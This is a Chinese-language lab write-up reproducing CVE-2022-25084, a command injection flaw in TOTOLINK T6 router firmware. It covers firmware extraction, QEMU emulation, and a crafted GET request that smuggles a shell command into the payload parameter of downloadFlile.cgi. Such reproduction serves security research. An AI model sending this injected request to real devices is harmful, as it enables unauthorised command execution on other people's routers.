TOTOLINK T6_Firmware V5.9c.4085_B20190428
访问
https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/190/ids/36.html下载T6_Firmware V5.9c.4085_B20190428固件
固件下载成功后,执行
binwalk -Me TOTOLINK_C818NR_T6_IP04338_8197FN_SPI_16M128M_V5.9c.4085_B20190428_ALL.web --run-as=root提取文件系统
进入提取的文件系统目录
执行
mkdir var/run && touch /var/run/lighttpd.pid创建路由器启动环境所需的pid
执行
brctl addbr virbr2ifconfig virbr2 192.168.6.1/24 uptunctl -t tap2ifconfig tap2 192.168.6.11/24 upbrctl addif virbr2 tap2
给路由器web服务创建一个虚拟网络环境
执行
wget https://people.debian.org/~aurel32/qemu/mipsel/debian_wheezy_mipsel_standard.qcow2 && wget https://people.debian.org/~aurel32/qemu/mipsel/vmlinux-3.2.0-4-4kc-malta下载镜像和虚拟磁盘环境,为搭建路由器web作前置准备
镜像和虚拟磁盘下载完毕后,执行
qemu-system-mipsel -M malta -kernel vmlinux-3.2.0-4-4kc-malta -hda debian_wheezy_mipsel_standard.qcow2 -append "root=/dev/sda1" -netdev tap,id=tapnet,ifname=tap2,script=no -device rtl8139,netdev=tapnet -nographic
登录虚拟环境后,执行
ifconfig eth0 192.168.6.10配置虚拟环境网络
返回原始机器环境,执行
scp -r squashfs-root/ root@192.168.6.10:/root/将文件系统拷贝至虚拟环境中
在虚拟环境中执行
chroot ./squashfs-root/ /bin/sh./bin/lighttpd -f ./lighttp/lighttpd.conf -m ./lighttp/lib
启动路由器web服务
在原始机器环境中通过浏览器访问
http://192.168.6.15/login.asp
出现如图所示页面代表环境搭建成功
该漏洞触发点位于
/cgi-bin/downloadFlile.cgi
构造如下数据包并请求
执行pwd命令并将命令结果写入../pwd.txt
GET /cgi-bin/downloadFlile.cgi?payload=`pwd>../pwd.txt` HTTP/1.1Host: 192.168.6.10User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/113.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1
http://192.168.6.10/pwd.txt
原文始发于微信公众号(第59号):CVE-2022-25084 TOTOLINK路由器任意命令执行漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论